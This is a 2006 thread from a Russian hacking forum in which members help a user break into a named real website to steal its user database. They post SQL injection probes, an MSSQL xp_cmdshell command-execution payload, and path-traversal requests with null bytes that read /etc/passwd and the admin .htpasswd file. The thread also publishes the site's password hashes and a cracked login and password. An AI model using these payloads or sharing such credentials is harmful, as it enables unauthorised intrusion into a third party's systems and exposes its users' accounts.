Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   sql inj (https://forum.antichat.xyz/showthread.php?t=29896)

satana8920 25.12.2006 23:04

sql inj
 
вот линка _http://gibbon.kinnet.ru/theme.php?theme=2
у меня есть подозрения что там иньекция я много чего пробовал но ни в какую в чем дело помогите пожалста

Koller 25.12.2006 23:15

Хм...теперь вопрос, с чего это у тебя такое подозрение возникло?
На все он отвечает...
Цитата:

An error occured.
Скули не вижу...по крайней мере пока...

satana8920 25.12.2006 23:17

ээй люди хелп ми плиззззззз

_Great_ 25.12.2006 23:18

Нету там инъекции. С чего ты взял, что есть?

satana8920 25.12.2006 23:22

An error occured. вот ето почему пишет обьясните ламеру

satana8920 25.12.2006 23:23

как мне на этот сервак залезть помогите кто нить кому делать нече репы дам

fucker"ok 25.12.2006 23:28

Упз. Пропустил с первого раза.
http://gibbon.kinnet.ru/theme.php?theme='2'
http://gibbon.kinnet.ru/theme.php?theme=2
Вывод аналогичный, значит инъекция всё-таки есть.

_Great_ 25.12.2006 23:30

Цитата:

An error occured. вот это почему пишет обьясните ламеру
учим английский.
An error occurred = произошла ошибка.
Теперь пораскинь мозгами и подумай, почему это пишет

guest3297 25.12.2006 23:31

_http://gibbon.kinnet.ru/theme.php?theme=3-1
_http://gibbon.kinnet.ru/theme.php?theme=2

_http://gibbon.kinnet.ru/theme.php?theme=2--

имхо иньекция есть но вывода нету...

satana8920 25.12.2006 23:32

а там ваще че нить есть помогите добры люди

satana8920 25.12.2006 23:33

Цитата:

Сообщение от [ cash ]
имхо иньекция есть но вывода нету...

и че в таком случае делать?

guest3297 25.12.2006 23:39

ну вобще сюдя по этим 2 запросам
http://gibbon.kinnet.ru/theme.php?theme=2/*
http://gibbon.kinnet.ru/theme.php?theme=2--
там mssql но по всем банерам на портах там стоит nix а на nix мало кто ставит...
если mssql можно попробывать исполнить произольные команды если юзер sa что точно не так... ну и остаеться посимвольный перебор...

satana8920 25.12.2006 23:42

даже могу точно сказать та линукс
а поизвольные команды это типа какие

guest3297 25.12.2006 23:44

1';exec%20master..xp_cmdshell%20'dir%20c:\'--

satana8920 25.12.2006 23:44

это типа чтоль скуль вслепую будет ??? :(

_Great_ 25.12.2006 23:48

Цитата:

ну вобще сюдя по этим 2 запросам
http://gibbon.kinnet.ru/theme.php?theme=2/*
http://gibbon.kinnet.ru/theme.php?theme=2--
там mssql н
Комментирование -- есть и на мускуле ;)

satana8920 25.12.2006 23:52

а как мона через эту хрень кондную строку открыть наприме или бд угнать

_Great_ 25.12.2006 23:55

скорее всего БД никак не угнать. разве что попробовать посимвольный перебор какого-нить админского пасса , но это большой геморрой :)

satana8920 25.12.2006 23:59

перебор пасов сам по себе оч большой геморой
че такой сервак непреступный что ль прямо _www.microsoft.com

satana8920 26.12.2006 00:17

че ваще мне та забацать то мона ??

guest3297 26.12.2006 00:24

Тебе подсказали.
Читай доки и разбирайся сам за тебя не кто делать нечего не будет.

Arin 26.12.2006 00:32

Незнаю, но это кажеться поинтереснее
_http://gibbon.kinnet.ru/gallerys/gallery.php?dir=

guest3297 26.12.2006 00:40

_http://gibbon.kinnet.ru/gallerys/gallery.php?dir=../../../../../../../../../etc/passwd%00

Arin 26.12.2006 00:52

Вот вот =)
Ну и если уж идти до конца
_http://gibbon.kinnet.ru/gallerys/gallery.php?dir=../admin/.htpasswd%00

содержит
Код:

gibbon:3WEU2LkbYfCpg locky:uOW.BYqJgmVko iSpy:fA03VOgkDCQ92 gibbon:3WEU2LkbYfCpg locky:uOW.BYqJgmVko iSpy:fA03VOgkDCQ92

gadjet 26.12.2006 08:59

Ну и если уж идти до конца, то кто-то должен брутить пароли.

guest3297 26.12.2006 16:26

[/quote]Ну и если уж идти до конца, то кто-то должен брутить пароли.[quote]
Слудующий пост будет
Ну и если уж идти до конца, то кто-то должен получить рута на хостинге....
мдя ребят совсем обнаглели.

satana8920 26.12.2006 16:41

патци это как я понимаю пасы gibbon:3WEU2LkbYfCpg locky:uOW.BYqJgmVko iSpy:fA03VOgkDCQ92 gibbon:3WEU2LkbYfCpg locky:uOW.BYqJgmVko iSpy:fA03VOgkDCQ92
всем по +1

limpompo 26.12.2006 17:41

login:locky
pass: underwat

guest3297 26.12.2006 17:54

2satana8920
это хеши в DES

satana8920 26.12.2006 22:45

да я уже понял что это хеши ща как нить расщифруем тока не знаю где джона взять под вынь

aivus 27.12.2006 00:06

satana8920
limpompo за тебя уже все сделал.

login:locky
pass: underwat

Тебе одного не хватит?

Talisman 27.12.2006 01:16

http://gibbon.kinnet.ru/gallerys/gallery.php?dir=../../index.php%00

хы )
http://webcam.kinnet.ru/

satana8920 27.12.2006 01:23

Цитата:

Сообщение от aivus
satana8920
limpompo за тебя уже все сделал.

login:locky
pass: underwat

Тебе одного не хватит?

понимаешь в чем дело друг мой мне нужна ВСЯ бд юзарей на этом сервере вот я че и парюсь

Talisman 27.12.2006 01:31

Warning: pg_exec() query failed: ERROR: Unterminated quoted string in /home/httpd/html/forum/forum.php3 on line 488

Warning: pg_numrows(): supplied argument is not a valid PostgreSQL result resource in /home/httpd/html/forum/forum.php3 on line

из-за бажного поиска форума - абсолютный путь его.... инклудимс )
http://gibbon.kinnet.ru/gallerys/gallery.php?dir=../../../httpd/html/forum/forum.php3%00

satana8920 27.12.2006 01:36

так мне БД нужна куда мне админки

satana8920 27.12.2006 01:40

ну мона впринципе на сервак че нить залить ибудет мне доступ ко всему через какой нить скрипт баговы
мона веть так чделать?

Talisman 27.12.2006 01:47

Цитата:

Сообщение от satana8920
так мне БД нужна куда мне админки

обижаешь! подумай хорошенько - чем больше зацепок, тем больше шанс.
и если ты знаеш, что тебе нужно и указываешь другим, что им не нужно делать, так может быть сам сделаешь?

satana8920 27.12.2006 01:50

да ладно я молчу :Х

satana8920 27.12.2006 01:53

Цитата:

Сообщение от Talisman
из-за бажного поиска форума - абсолютный путь его.... инклудимс )
http://gibbon.kinnet.ru/gallerys/gallery.php?dir=../../../httpd/html/forum/forum.php3%00

а смысл вот этого инклуда чего он нам дает то ??

Arin 27.12.2006 02:03

Наверное фсетаки офтоп, но судя по новостям на _http://gibbon.kinnet.ru, уже даже найденные дырочки вскоре прикроют. Зря наверно подобранные пароли выложили..
Хотя конечно как показывает практика, (_4919.fatal.ru) админ может на сайт не заглядывать месяцами.


Время: 09:21